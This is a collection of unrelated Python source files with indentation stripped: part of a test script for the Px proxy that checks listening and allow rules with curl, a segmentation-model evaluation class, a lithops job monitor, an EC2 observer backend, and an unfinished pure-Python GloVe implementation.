p = multiprocessing.Process(target=runPxTest, args=(cmd, testproc, ips, port, PROXY))
p.start()
return p
def getips():
localips = [ip[4][0] for ip in socket.getaddrinfo(socket.gethostname(), 80, socket.AF_INET)]
localips.insert(0, "127.0.0.1")
return localips
def checkPxStart(ip, port):
# Make sure Px starts
retry = 20
while True:
try:
socket.create_connection((ip, port), 2)
break
except (socket.timeout, ConnectionRefusedError):
time.sleep(1)
retry -= 1
if retry == 0:
print("Px didn't start")
return False
return True
# Test --listen and --port, --hostonly, --gateway and --allow
def checkCommon(ips, port, checkProc):
if ips == [""]:
ips = ["127.0.0.1"]
if port == "":
port = "3128"
port = int(port)
if not checkPxStart(ips[0], port):
return False
localips = getips()
for lip in localips:
for pport in set([3128, port]):
sys.stdout.write(" Checking: " + lip + ":" + str(pport) + " = ")
ret = checkProc(lip, pport)
sys.stdout.write(str(ret) + ": ")
if ((lip not in ips or port != pport) and ret is False) or (lip in ips and port == pport and ret is True):
print("Passed")
else:
print("Failed")
return False
return True
def checkSocket(ips, port):
def checkProc(lip, pport):
try:
socket.create_connection((lip, pport), 2)
except (socket.timeout, ConnectionRefusedError):
return False
return True
return checkCommon(ips, port, checkProc)
def checkFilter(ips, port):
def checkProc(lip, port):
rcode = subprocess.call("curl --proxy " + lip + ":" + str(port) + " http://google.com",
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
sys.stdout.write(str(rcode) + " ")
if rcode == 0:
return True
elif rcode in [7, 52, 56]:
return False
else:
print("Weird curl return " + str(rcode))
sys.exit()
return checkCommon(ips, port, checkProc)
def remoteTest(port, fail=False):
lip = 'echo $SSH_CLIENT ^| cut -d \\\" \\\" -f 1,1'
cmd = os.getenv("REMOTE_SSH")
if cmd is None:
print("Skipping remote test - REMOTE_SSH not set")
return
cmd = cmd + " curl --proxy `%s`:%s --connect-timeout 2 -s http://google.com" % (lip, port)
sys.stdout.write(" Checking: Remote:" + str(port) + " = ")
ret = subprocess.call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
if (ret == 0 and fail == False) or (ret != 0 and fail == True) :
print(str(ret) + ": Passed")
else:
print(str(ret) + ": Failed")
return False
return True
def hostonlyTest(ips, port):
return checkSocket(ips, port) and remoteTest(port, fail=True)
def gatewayTest(ips, port):
return checkSocket(ips, port) and remoteTest(port)
def allowTest127(ips, port):
return checkFilter(ips, port) and remoteTest(port, fail=True)
def allowTest169(ips, port):
return checkFilter(ips, port) and remoteTest(port, fail=True)
def allowTest192(ips, port):
return checkFilter(ips, port) and remoteTest(port)
def listenTestLocal(ip, port):
return checkSocket([ip], port) and remoteTest(port, fail=True)
def listenTestRemote(ip, port):
return checkSocket([ip], port) and remoteTest(port)
def proxyTest(base, port):
return run(base, port)
def noproxyTest(base, port):
return run(base, port)
def socketTestSetup():
if "--nohostonly" not in sys.argv:
TESTS.append(("--proxy=" + PROXY + " --hostonly", hostonlyTest, getips()))
if "--nogateway" not in sys.argv:
TESTS.append(("--proxy=" + PROXY + " --gateway", gatewayTest, getips()))
if "--noallow" not in sys.argv:
TESTS.append(("--proxy=" + PROXY + " --gateway --allow=127.*.*.*",
allowTest127, [""]))
TESTS.append(("--proxy=" + PROXY + " --gateway --allow=169.*.*.*",
allowTest169, list(filter(lambda x: "169" in x, getips()))))
TESTS.append(("--proxy=" + PROXY + " --gateway --allow=192.*.*.*",
allowTest192, list(filter(lambda x: "192" in x, getips()))))
if "--nolisten" not in sys.argv:
localips = getips()
localips.insert(0, "")
localips.remove("127.0.0.1")
for ip in localips[:3]:
cmd = "--proxy=" + PROXY
if ip != "":
cmd += " --listen=" + ip
testproc = listenTestLocal
if "192" in ip:
testproc = listenTestRemote
TESTS.append((cmd, testproc, ip))
def auto():
# Make temp directory
try:
shutil.rmtree("testrun")
except:
pass
time.sleep(1)
try:
os.makedirs("testrun", exist_ok=True)
except TypeError:
try:
os.makedirs("testrun")
except WindowsError:
pass
os.chdir("testrun")
# Load base px.ini
shutil.copy("../px.ini", ".")
shutil.copy("../px.py", ".")
shutil.copy("../dist/px.exe", ".")
# Setup tests
socketTestSetup()
if "--noproxy" not in sys.argv:
TESTS.append(("--workers=4 --proxy=" + PROXY, proxyTest, BASEURL))
if "--nonoproxy" not in sys.argv:
TESTS.append(("--workers=4 --threads=30 --noproxy=*.*.*.*", noproxyTest, BASEURL))
count = 1
for test in TESTS:
procs = []
# Latest version
procs.append(runTest(test, "c:\\Miniconda\\python", count))
count += 1
# Test different versions of Python
pys = ["27", "34", "35"]
for py in pys:
procs.append(runTest(test, "c:\\Miniconda\\envs\\%s\\python" % py, count))
count += 1
# Run px.exe
procs.append(runTest(test, None, count))
count += 1
if not waitprocs(procs):
break
os.chdir("..")
if __name__ == "__main__":
"""python test.py testproxy.org:80 http://baseurl.com
Point test.py to the NTLM proxy server that Px should connect through
Base URL is some base webpage which will be spidered for URLs to
compare results directly through proxy and through Px"""
if len(sys.argv) > 1:
PROXY = sys.argv[1]
if len(sys.argv) > 2:
BASEURL = sys.argv[2]
if PROXY == "" or BASEURL == "":
sys.exit()
auto()
|
tester.py
|
import os
import os.path as osp
import cv2
import numpy as np
import time
from tqdm import tqdm
import torch
import torch.nn.functional as F
import torch.multiprocessing as mp
from engine.logger import get_logger
from utils.pyt_utils import load_model, link_file, ensure_dir
from utils.img_utils import pad_image_to_shape, normalize
logger = get_logger()
class Tester(object):
def __init__(self, dataset, class_num, image_mean, image_std, network,
multi_scales, is_flip, devices=0, out_idx=0, threds=3, config=None, logger=None,
verbose=False, save_path=None, show_image=False):
self.dataset = dataset
self.ndata = self.dataset.get_length()
self.class_num = class_num
self.image_mean = image_mean
self.image_std = image_std
self.multi_scales = multi_scales
self.is_flip = is_flip
self.network = network
self.devices = devices
if type(self.devices) == int: self.devices = [self.devices]
self.out_idx = out_idx
self.threds = threds
self.config = config
self.logger = logger
self.context = mp.get_context('spawn')
self.val_func = None
self.results_queue = self.context.Queue(self.ndata)
self.verbose = verbose
self.save_path = save_path
if save_path is not None:
ensure_dir(save_path)
self.show_image = show_image
def run(self, model_path, model_indice, log_file, log_file_link):
"""There are four evaluation modes:
1.only eval a .pth model: -e *.pth
2.only eval a certain epoch: -e epoch
3.eval all epochs in a given section: -e start_epoch-end_epoch
4.eval all epochs from a certain started epoch: -e start_epoch-
"""
if '.pth' in model_indice:
models = [model_indice, ]
elif "-" in model_indice:
start_epoch = int(model_indice.split("-")[0])
end_epoch = model_indice.split("-")[1]
models = os.listdir(model_path)
models.remove("epoch-last.pth")
sorted_models = [None] * len(models)
model_idx = [0] * len(models)
for idx, m in enumerate(models):
num = m.split(".")[0].split("-")[1]
model_idx[idx] = num
sorted_models[idx] = m
model_idx = np.array([int(i) for i in model_idx])
down_bound = model_idx >= start_epoch
up_bound = [True] * len(sorted_models)
if end_epoch:
end_epoch = int(end_epoch)
assert start_epoch < end_epoch
up_bound = model_idx <= end_epoch
bound = up_bound * down_bound
model_slice = np.array(sorted_models)[bound]
models = [os.path.join(model_path, model) for model in
model_slice]
else:
models = [os.path.join(model_path,
'epoch-%s.pth' % model_indice), ]
results = open(log_file, 'a')
link_file(log_file, log_file_link)
for model in models:
logger.info("Load Model: %s" % model)
self.val_func = load_model(self.network, model)
result_line, mIoU = self.multi_process_evaluation()
results.write('Model: ' + model + '\n')
results.write(result_line)
results.write('\n')
results.flush()
results.close()
def run_online(self):
"""
eval during training
"""
self.val_func = self.network
self.single_process_evaluation()
def single_process_evaluation(self):
with torch.no_grad():
for idx in tqdm(range(self.ndata)):
dd = self.dataset[idx]
self.func_per_iteration(dd, self.devices[0], iter=idx)
def run_online_multiprocess(self):
"""
eval during training
"""
self.val_func = self.network
self.multi_process_single_gpu_evaluation()
def multi_process_single_gpu_evaluation(self):
# start_eval_time = time.perf_counter()
stride = int(np.ceil(self.ndata / self.threds))
# start multi-process on single-gpu
procs = []
for d in range(self.threds):
e_record = min((d + 1) * stride, self.ndata)
shred_list = list(range(d * stride, e_record))
device = self.devices[0]
logger.info('Thread %d handle %d data.' % (d, len(shred_list)))
p = self.context.Process(target=self.worker, args=(shred_list, device))
procs.append(p)
for p in procs:
p.start()
for p in procs:
p.join()
def multi_process_evaluation(self):
start_eval_time = time.perf_counter()
nr_devices = len(self.devices)
stride = int(np.ceil(self.ndata / nr_devices))
# start multi-process on multi-gpu
procs = []
for d in range(nr_devices):
e_record = min((d + 1) * stride, self.ndata)
shred_list = list(range(d * stride, e_record))
device = self.devices[d]
logger.info('GPU %s handle %d data.' % (device, len(shred_list)))
p = self.context.Process(target=self.worker, args=(shred_list, device))
procs.append(p)
for p in procs:
p.start()
for p in procs:
p.join()
def worker(self, shred_list, device):
start_load_time = time.time()
# logger.info('Load Model on Device %d: %.2fs' % (device, time.time() - start_load_time))
for idx in shred_list:
dd = self.dataset[idx]
results_dict = self.func_per_iteration(dd, device, iter=idx)
self.results_queue.put(results_dict)
def func_per_iteration(self, data, device, iter=None):
raise NotImplementedError
def compute_metric(self, results):
raise NotImplementedError
# evaluate the whole image at once
def whole_eval(self, img, output_size, input_size=None, device=None):
if input_size is not None:
img, margin = self.process_image(img, input_size)
else:
img = self.process_image(img, input_size)
pred = self.val_func_process(img, device)
if input_size is not None:
pred = pred[:, margin[0]:(pred.shape[1] - margin[1]),
margin[2]:(pred.shape[2] - margin[3])]
pred = pred.permute(1, 2, 0)
pred = pred.cpu().numpy()
if output_size is not None:
pred = cv2.resize(pred,
(output_size[1], output_size[0]),
interpolation=cv2.INTER_LINEAR)
pred = pred.argmax(2)
return pred
# slide the window to evaluate the image
def sliding_eval(self, img, crop_size, stride_rate, device=None):
ori_rows, ori_cols, c = img.shape
processed_pred = np.zeros((ori_rows, ori_cols, self.class_num))
for s in self.multi_scales:
img_scale = cv2.resize(img, None, fx=s, fy=s,
interpolation=cv2.INTER_LINEAR)
new_rows, new_cols, _ = img_scale.shape
processed_pred += self.scale_process(img_scale,
(ori_rows, ori_cols),
crop_size, stride_rate, device)
pred = processed_pred.argmax(2)
return pred
def scale_process(self, img, ori_shape, crop_size, stride_rate,
device=None):
new_rows, new_cols, c = img.shape
long_size = new_cols if new_cols > new_rows else new_rows
if long_size <= crop_size:
input_data, margin = self.process_image(img, crop_size)
score = self.val_func_process(input_data, device)
score = score[:, margin[0]:(score.shape[1] - margin[1]),
margin[2]:(score.shape[2] - margin[3])]
else:
stride = int(np.ceil(crop_size * stride_rate))
img_pad, margin = pad_image_to_shape(img, crop_size,
cv2.BORDER_CONSTANT, value=0)
pad_rows = img_pad.shape[0]
pad_cols = img_pad.shape[1]
r_grid = int(np.ceil((pad_rows - crop_size) / stride)) + 1
c_grid = int(np.ceil((pad_cols - crop_size) / stride)) + 1
data_scale = torch.zeros(self.class_num, pad_rows, pad_cols).cuda(
device)
count_scale = torch.zeros(self.class_num, pad_rows, pad_cols).cuda(
device)
for grid_yidx in range(r_grid):
for grid_xidx in range(c_grid):
s_x = grid_xidx * stride
s_y = grid_yidx * stride
e_x = min(s_x + crop_size, pad_cols)
e_y = min(s_y + crop_size, pad_rows)
s_x = e_x - crop_size
s_y = e_y - crop_size
img_sub = img_pad[s_y:e_y, s_x: e_x, :]
count_scale[:, s_y: e_y, s_x: e_x] += 1
input_data, tmargin = self.process_image(img_sub, crop_size)
temp_score = self.val_func_process(input_data, device)
temp_score = temp_score[:,
tmargin[0]:(temp_score.shape[1] - tmargin[1]),
tmargin[2]:(temp_score.shape[2] - tmargin[3])]
data_scale[:, s_y: e_y, s_x: e_x] += temp_score
# score = data_scale / count_scale
score = data_scale
score = score[:, margin[0]:(score.shape[1] - margin[1]),
margin[2]:(score.shape[2] - margin[3])]
score = score.permute(1, 2, 0)
data_output = cv2.resize(score.cpu().numpy(),
(ori_shape[1], ori_shape[0]),
interpolation=cv2.INTER_LINEAR)
return data_output
def val_func_process(self, input_data, device=None):
input_data = np.ascontiguousarray(input_data[None, :, :, :], dtype=np.float32)
input_data = torch.FloatTensor(input_data).cuda(device)
with torch.cuda.device(input_data.get_device()):
self.val_func.eval()
self.val_func.to(input_data.get_device())
with torch.no_grad():
score = self.val_func(input_data)
if (isinstance(score, tuple) or isinstance(score, list)) and len(score) > 1:
score = score[self.out_idx]
score = score[0] # a single image pass, ignore batch dim
if self.is_flip:
input_data = input_data.flip(-1)
score_flip = self.val_func(input_data)
score_flip = score_flip[0]
score += score_flip.flip(-1)
score = torch.exp(score)
# score = score.data
return score
def process_image(self, img, crop_size=None):
p_img = img
if img.shape[2] < 3:
im_b = p_img
im_g = p_img
im_r = p_img
p_img = np.concatenate((im_b, im_g, im_r), axis=2)
p_img = normalize(p_img, self.image_mean, self.image_std)
if crop_size is not None:
p_img, margin = pad_image_to_shape(p_img, crop_size, cv2.BORDER_CONSTANT, value=0)
p_img = p_img.transpose(2, 0, 1)
return p_img, margin
p_img = p_img.transpose(2, 0, 1)
return p_img
|
monitor.py
|
#
# Copyright Cloudlab URV 2021
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import pika
import logging
import time
import lithops
import pickle
import sys
import queue
import threading
import concurrent.futures as cf
from tblib import pickling_support
from lithops.constants import MONITORING_INTERVAL
pickling_support.install()
logger = logging.getLogger(__name__)
class Monitor(threading.Thread):
"""
Monitor base class
"""
def __init__(self, executor_id,
internal_storage,
token_bucket_q,
generate_tokens,
config):
super().__init__()
self.executor_id = executor_id
self.futures = []
self.internal_storage = internal_storage
self.should_run = True
self.token_bucket_q = token_bucket_q
self.generate_tokens = generate_tokens
self.config = config
self.daemon = True
# vars for _generate_tokens
self.workers = {}
self.workers_done = []
self.callids_done_worker = {}
self.job_chunksize = {}
self.present_jobs = set()
def add_futures(self, fs, job_id=None, chunksize=None):
"""
Extends the current thread list of futures to track
"""
self.futures.extend(fs)
# this is required for FaaS backends and _generate_tokens
if job_id:
self.job_chunksize[job_id] = chunksize
present_jobs = {f.job_id for f in fs}
for job_id in present_jobs:
self.present_jobs.add(job_id)
def _all_ready(self):
"""
Checks if all futures are ready, success or done
"""
return all([f.ready or f.success or f.done for f in self.futures])
def _check_new_futures(self, call_status, f):
"""Checks if a functions returned new futures to track"""
if 'new_futures' not in call_status:
return False
f._set_futures(call_status)
self.futures.extend(f._new_futures)
logger.debug(f'ExecutorID {self.executor_id} - Got {len(f._new_futures)} new futures to track')
return True
def _future_timeout_checker(self, futures):
"""
Checks if running futures exceeded the timeout
"""
current_time = time.time()
futures_running = [f for f in futures if f.running]
for fut in futures_running:
try:
start_tstamp = fut._call_status['worker_start_tstamp']
fut_timeout = start_tstamp + fut.execution_timeout + 5
if current_time > fut_timeout:
msg = 'The function did not run as expected.'
raise TimeoutError('HANDLER', msg)
except TimeoutError:
# generate fake TimeoutError call status
pickled_exception = str(pickle.dumps(sys.exc_info()))
call_status = {'type': '__end__',
'exception': True,
'exc_info': pickled_exception,
'executor_id': fut.executor_id,
'job_id': fut.job_id,
'call_id': fut.call_id,
'activation_id': fut.activation_id}
fut._set_ready(call_status)
def _print_status_log(self):
"""prints a debug log showing the status of the job"""
callids_pending = len([f for f in self.futures if f.invoked])
callids_running = len([f for f in self.futures if f.running])
callids_done = len([f for f in self.futures if f.ready or f.success or f.done])
logger.debug(f'ExecutorID {self.executor_id} - Pending: {callids_pending} '
f'- Running: {callids_running} - Done: {callids_done}')
class RabbitmqMonitor(Monitor):
def __init__(self, executor_id, internal_storage, token_bucket_q, generate_tokens, config):
super().__init__(executor_id, internal_storage, token_bucket_q, generate_tokens, config)
self.rabbit_amqp_url = config.get('amqp_url')
self.queue = f'lithops-{self.executor_id}'
self._create_resources()
def _create_resources(self):
"""
Creates RabbitMQ queues and exchanges of a given job
"""
logger.debug(f'ExecutorID {self.executor_id} - Creating RabbitMQ queue {self.queue}')
self.pikaparams = pika.URLParameters(self.rabbit_amqp_url)
self.connection = pika.BlockingConnection(self.pikaparams)
channel = self.connection.channel()
channel.queue_declare(queue=self.queue, auto_delete=True)
channel.close()
def _delete_resources(self):
"""
Deletes RabbitMQ queues and exchanges of a given job.
"""
connection = pika.BlockingConnection(self.pikaparams)
channel = connection.channel()
channel.queue_delete(queue=self.queue)
channel.close()
connection.close()
def stop(self):
"""
Stops the monitor thread
"""
self.should_run = False
self._delete_resources()
def _tag_future_as_running(self, call_status):
"""
Assigns a call_status to its future
"""
not_running_futures = [f for f in self.futures if not (f.running or f.ready or f.success or f.done)]
for f in not_running_futures:
calljob_id = (call_status['executor_id'], call_status['job_id'], call_status['call_id'])
if (f.executor_id, f.job_id, f.call_id) == calljob_id:
f._set_running(call_status)
def _tag_future_as_ready(self, call_status):
"""
tags a future as ready based on call_status
"""
not_ready_futures = [f for f in self.futures if not (f.ready or f.success or f.done)]
for f in not_ready_futures:
calljob_id = (call_status['executor_id'], call_status['job_id'], call_status['call_id'])
if (f.executor_id, f.job_id, f.call_id) == calljob_id:
if not self._check_new_futures(call_status, f):
f._set_ready(call_status)
def _generate_tokens(self, call_status):
"""
generates a new token for the invoker
"""
if not self.generate_tokens or not self.should_run:
return
call_id = (call_status['executor_id'], call_status['job_id'], call_status['call_id'])
worker_id = call_status['activation_id']
if worker_id not in self.callids_done_worker:
self.callids_done_worker[worker_id] = []
self.callids_done_worker[worker_id].append(call_id)
if worker_id not in self.workers_done and \
len(self.callids_done_worker[worker_id]) == call_status['chunksize']:
self.workers_done.append(worker_id)
if self.should_run:
self.token_bucket_q.put('#')
def run(self):
logger.debug(f'ExecutorID {self.executor_id} | Starting RabbitMQ job monitor')
channel = self.connection.channel()
def callback(ch, method, properties, body):
call_status = json.loads(body.decode("utf-8"))
if call_status['type'] == '__init__':
self._tag_future_as_running(call_status)
elif call_status['type'] == '__end__':
self._generate_tokens(call_status)
self._tag_future_as_ready(call_status)
if self._all_ready() or not self.should_run:
ch.stop_consuming()
ch.close()
self._print_status_log()
logger.debug(f'ExecutorID {self.executor_id} | RabbitMQ job monitor finished')
channel.basic_consume(self.queue, callback, auto_ack=True)
threading.Thread(target=channel.start_consuming, daemon=True).start()
while not self._all_ready() or not self.futures:
# Format call_ids running, pending and done
self._print_status_log()
self._future_timeout_checker(self.futures)
time.sleep(2)
if not self.should_run:
break
class StorageMonitor(Monitor):
THREADPOOL_SIZE = 64
def __init__(self, executor_id, internal_storage, token_bucket_q, generate_tokens, config):
super().__init__(executor_id, internal_storage, token_bucket_q, generate_tokens, config)
self.monitoring_interval = config['monitoring_interval']
# vars for _generate_tokens
self.callids_running_worker = {}
self.callids_running_processed = set()
self.callids_done_processed = set()
# vars for _mark_status_as_running
self.callids_running_processed_timeout = set()
# vars for _mark_status_as_ready
self.callids_done_processed_status = set()
def stop(self):
"""
Stops the monitor thread
"""
self.should_run = False
def _tag_future_as_running(self, callids_running):
"""
Mark which futures are in running status based on callids_running
"""
current_time = time.time()
not_running_futures = [f for f in self.futures if not (f.running or f.ready or f.success or f.done)]
callids_running_to_process = callids_running - self.callids_running_processed_timeout
for f in not_running_futures:
for call in callids_running_to_process:
if f.invoked and (f.executor_id, f.job_id, f.call_id) == call[0]:
call_status = {'type': '__init__',
'activation_id': call[1],
'worker_start_tstamp': current_time}
f._set_running(call_status)
self.callids_running_processed_timeout.update(callids_running_to_process)
self._future_timeout_checker(self.futures)
def _tag_future_as_ready(self, callids_done):
"""
Mark which futures has a call_status ready to be downloaded
"""
not_ready_futures = [f for f in self.futures if not (f.ready or f.success or f.done)]
callids_done_to_process = callids_done - self.callids_done_processed_status
fs_to_query = []
ten_percent = int(len(self.futures) * (10 / 100))
if len(self.futures) - len(callids_done) <= max(10, ten_percent):
fs_to_query = not_ready_futures
else:
for f in not_ready_futures:
if (f.executor_id, f.job_id, f.call_id) in callids_done_to_process:
fs_to_query.append(f)
if not fs_to_query:
return
def get_status(f):
cs = self.internal_storage.get_call_status(f.executor_id, f.job_id, f.call_id)
f._status_query_count += 1
if cs:
if not self._check_new_futures(cs, f):
f._set_ready(cs)
return (f.executor_id, f.job_id, f.call_id)
else:
return None
try:
pool = cf.ThreadPoolExecutor(max_workers=self.THREADPOOL_SIZE)
call_ids_processed = set(pool.map(get_status, fs_to_query))
pool.shutdown()
except Exception:
pass
try:
call_ids_processed.remove(None)
except Exception:
pass
try:
self.callids_done_processed_status.update(call_ids_processed)
except Exception:
pass
def _generate_tokens(self, callids_running, callids_done):
"""
Method that generates new tokens
"""
if not self.generate_tokens or not self.should_run:
return
callids_running_to_process = callids_running - self.callids_running_processed
callids_done_to_process = callids_done - self.callids_done_processed
for call_id, worker_id in callids_running_to_process:
if worker_id not in self.workers:
self.workers[worker_id] = set()
self.workers[worker_id].add(call_id)
self.callids_running_worker[call_id] = worker_id
for callid_done in callids_done_to_process:
if callid_done in self.callids_running_worker:
worker_id = self.callids_running_worker[callid_done]
if worker_id not in self.callids_done_worker:
self.callids_done_worker[worker_id] = []
self.callids_done_worker[worker_id].append(callid_done)
for worker_id in self.callids_done_worker:
job_id = self.callids_done_worker[worker_id][0][1]
if job_id not in self.present_jobs:
continue
chunksize = self.job_chunksize[job_id]
if worker_id not in self.workers_done and \
len(self.callids_done_worker[worker_id]) == chunksize:
self.workers_done.append(worker_id)
if self.should_run:
self.token_bucket_q.put('#')
else:
break
self.callids_running_processed.update(callids_running_to_process)
self.callids_done_processed.update(callids_done_to_process)
def run(self):
"""
Run method
"""
logger.debug(f'ExecutorID {self.executor_id} - Starting Storage job monitor')
WAIT_DUR_SEC = self.monitoring_interval
while not self._all_ready() or not self.futures:
time.sleep(WAIT_DUR_SEC)
WAIT_DUR_SEC = self.monitoring_interval
if not self.should_run:
break
callids_running, callids_done = \
self.internal_storage.get_job_status(self.executor_id)
# verify if there are new callids_done and reduce the sleep
new_callids_done = callids_done - self.callids_done_processed_status
if len(new_callids_done) > 0:
WAIT_DUR_SEC = 0.5
# generate tokens and mark futures as runiing/done
self._generate_tokens(callids_running, callids_done)
self._tag_future_as_running(callids_running)
self._tag_future_as_ready(callids_done)
self._print_status_log()
logger.debug(f'ExecutorID {self.executor_id} - Storage job monitor finished')
class JobMonitor:
def __init__(self, executor_id, internal_storage, config=None):
self.executor_id = executor_id
self.internal_storage = internal_storage
self.config = config
self.backend = self.config['lithops']['monitoring'].lower() if config else 'storage'
self.token_bucket_q = queue.Queue()
self.monitor = None
self.MonitorClass = getattr(
lithops.monitor,
f'{self.backend.capitalize()}Monitor'
)
def start(self, fs, job_id=None, chunksize=None, generate_tokens=False):
if self.backend == 'storage':
mi = self.config['lithops'].get('monitoring_interval', MONITORING_INTERVAL)\
if self.config else MONITORING_INTERVAL
bk_config = {'monitoring_interval': mi}
else:
bk_config = self.config.get(self.backend)
if not self.monitor or not self.monitor.is_alive():
self.monitor = self.MonitorClass(
executor_id=self.executor_id,
internal_storage=self.internal_storage,
token_bucket_q=self.token_bucket_q,
generate_tokens=generate_tokens,
config=bk_config
)
self.monitor.start()
self.monitor.add_futures(fs, job_id, chunksize)
def stop(self):
if self.monitor and self.monitor.is_alive():
self.monitor.stop()
|
ec2_backend.py
|
import threading
import time
from ec2_observer.event_loop import XOSObserver
from ec2_observer.event_manager import EventListener
from xos.logger import Logger, logging
logger = Logger(level=logging.INFO)
class Backend:
def run(self):
try:
# start the openstack observer
observer = XOSObserver()
observer_thread = threading.Thread(target=observer.run)
observer_thread.start()
# start event listene
event_manager = EventListener(wake_up=observer.wake_up)
event_manager_thread = threading.Thread(target=event_manager.run)
event_manager_thread.start()
except:
logger.log_exc("Exception in child thread")
|
pyglove.py
|
import numpy as np
import multiprocessing as mp
import random
import functools
import ctypes
def glove_compute_and_update_grads(coo_list, Warr, Garr, shape, cost, count, x_max, alpha, initial_learning_rate):
Wall = np.frombuffer(Warr)
Wall = Wall.reshape(shape)
W = Wall[:,:,:-1]
B = Wall[:,:,-1]
Gall = np.frombuffer(Garr)
Gall = Gall.reshape(shape)
Gw = Gall[:,:,:-1]
Gb = Gall[:,:,-1]
cost.value = 0.0
count.value = 0
for wid_pair, val in coo_list: # cr is coo record of ((target_wid, context_wid), val)
wid_target, wid_context = wid_pair
diff = np.dot(W[0][wid_target],W[1][wid_context])
diff += B[0][wid_target] + B[1][wid_context] - np.log(val)
fdiff = diff if val > x_max else np.power(val/x_max, alpha) * diff
if True in [ np.isnan(d) or np.isinf(d) for d in (diff, fdiff)]:
continue
cost.value += 0.5 * fdiff * fdiff
count.value += 1
grad_w0 = np.clip(fdiff*W[1][wid_context],-100,100) * initial_learning_rate # initial gradient
grad_w1 = np.clip(fdiff*W[0][wid_target],-100,100) * initial_learning_rate # initial gradient
upd_w0 = grad_w0 / np.sqrt(Gw[0][wid_target]) # adagrad adjustment
upd_w1 = grad_w1 / np.sqrt(Gw[1][wid_context]) # adagrad adjustment
Gw[0][wid_target] += np.square(grad_w0)
Gw[1][wid_context] += np.square(grad_w1)
if True not in [np.isnan(upd_val) or np.isinf(upd_val) for upd_val in (np.sum(upd_w0), np.sum(upd_w1))]:
W[0][wid_target] -= upd_w0
W[1][wid_context] -= upd_w1
upd_b0 = fdiff/np.sqrt(Gb[0][wid_target])
upd_b1 = fdiff/np.sqrt(Gb[1][wid_context])
Gb[0][wid_target] += np.square(fdiff)
Gb[1][wid_context] += np.square(fdiff)
if True not in [np.isnan(upd_val) or np.isinf(upd_val) for upd_val in (upd_b0, upd_b1)]:
B[0][wid_target] -= upd_b0
B[1][wid_context] -= upd_b1
class Glove(object):
"""
Class for GloVe word embeddings implemented only on python
"""
def __init__(self, sentences, num_component, min_count=1, max_vocab=0, window_size=15, distance_weighting=True, window_range=None):
self.num_component = num_component
self.check_sentences(sentences, window_range)
self.build_vocabulary(sentences, min_count, max_vocab)
if window_range is None: # cooccurrence counting based on window_size of integer, distance is 1 between adjacent words
self.count_cooccurrence(sentences, window_size, distance_weighting)
else:
self.count_cooccurrence_range(sentences, window_range, distance_weighting)
self.initialize_weights()
def check_sentences(self, sentences, window_range):
if window_range is None:
return
for sentence in sentences:
for word in sentence:
if type(word) is not tuple or len(word) != 2:
raise ValueError("word {0} is not acceptable to window range mode, need a pair of (str, float)".format(word))
def build_vocabulary(self, sentences, min_count=1, max_vocab=0):
word_dict = {}
for sentence in sentences:
for word in sentence:
if type(word) is tuple:
word = word[0]
if word_dict.get(word) is None:
word_dict[word] = 0
word_dict[word] += 1
self.word_count = [(w,c) for w,c in word_dict.items() if c >= min_count]
self.word_count.sort(key=functools.cmp_to_key(lambda lhs,rhs : rhs[1] - lhs[1] if rhs[1] != lhs[1] else -1 if lhs[0] < rhs[0] else 1 if lhs[0] > rhs[0] else 0))
if max_vocab > 0:
self.word_count = self.word_count[0:max_vocab]
self.word_to_wid = { wc[0]:i for i, wc in enumerate(self.word_count) }
self.wid_to_word = { i:wc[0] for i, wc in enumerate(self.word_count) }
self.shape = (2, len(self.word_count), self.num_component+1)
def count_cooccurrence(self, sentences, window_size, distance_weighting):
coo = {}
for sentence in sentences:
words = sentence
for ti, word in enumerate(sentence):
if self.word_to_wid.get(word) is None:
continue
wid_target = self.word_to_wid[word]
for ci in range(max(ti-window_size,0),ti): # for words left to target word within window
if self.word_to_wid.get(words[ci]) is None:
continue
wid_context = self.word_to_wid[words[ci]]
if wid_target == wid_context:
continue
key = (wid_target,wid_context)
if coo.get(key) is None:
coo[key] = 0.0
weight = 1.0/(ti-ci) if distance_weighting else 1.0
coo[key] += weight
rkey = (wid_context,wid_target)
if coo.get(rkey) is None:
coo[rkey] = 0.0
coo[rkey] += weight
self.coo_records = list(coo.items())
random.shuffle(self.coo_records)
def count_cooccurrence_range(self, sentences, window_range, distance_weighting):
coo = {}
for sentence in sentences:
words = sentence
lb_ci = 0
for ti, pair in enumerate(sentence):
word_target, word_target_value = pair
if self.word_to_wid.get(word_target) is None:
continue
wid_target = self.word_to_wid[word_target]
search_range = range(lb_ci,ti)
for ci in search_range:
word_context, word_context_value = words[ci]
if word_target_value - word_context_value > window_range:
lb_ci = ci+1
continue
if self.word_to_wid.get(word_context) is None:
continue
wid_context = self.word_to_wid[word_context]
if wid_target == wid_context:
continue
key = (wid_target,wid_context)
weight = (word_context_value - word_target_value + window_range)/window_range if distance_weighting else 1.0
if coo.get(key) is None:
coo[key] = 0.0
coo[key] += weight
rkey = (wid_context,wid_target)
if coo.get(rkey) is None:
coo[rkey] = 0.0
coo[rkey] += weight
self.coo_records = list(coo.items())
random.shuffle(self.coo_records)
def initialize_weights(self):
num_elem = int(np.prod(self.shape))
self.Warr = mp.RawArray(ctypes.c_double, num_elem)
Wall = np.frombuffer(self.Warr)
Wall[:] = (np.random.rand(len(Wall)) - 0.5)/self.num_component # a pair of word_vector and bias # (100+1)*2
Wall = Wall.reshape(*self.shape)
self.W = Wall[:,:,:-1]
self.B = Wall[:,:,-1]
self.Garr = mp.RawArray(ctypes.c_double, num_elem)
Gall = np.frombuffer(self.Garr)
Gall[:] = np.ones(len(Gall))
Gall = Gall.reshape(*self.shape)
self.Gw = Gall[:,:,:-1]
self.Gb = Gall[:,:,-1]
def fit(self, force_initialize=False, num_iteration=50, num_procs=8, x_max=100, alpha=0.75, learning_rate=0.05, verbose=False):
if verbose:
print("training parameters = {}".format(dict(locals())))
if force_initialize:
initialize_weights()
history = {'loss':[]}
coo_list = self.coo_records
for iter in range(num_iteration):
if verbose:
print("iteration # %d ... " % iter, end="")
cost_list = [mp.Value('d', 0.0) for i in range(num_procs)]
count_list = [mp.Value('i', 0) for i in range(num_procs)]
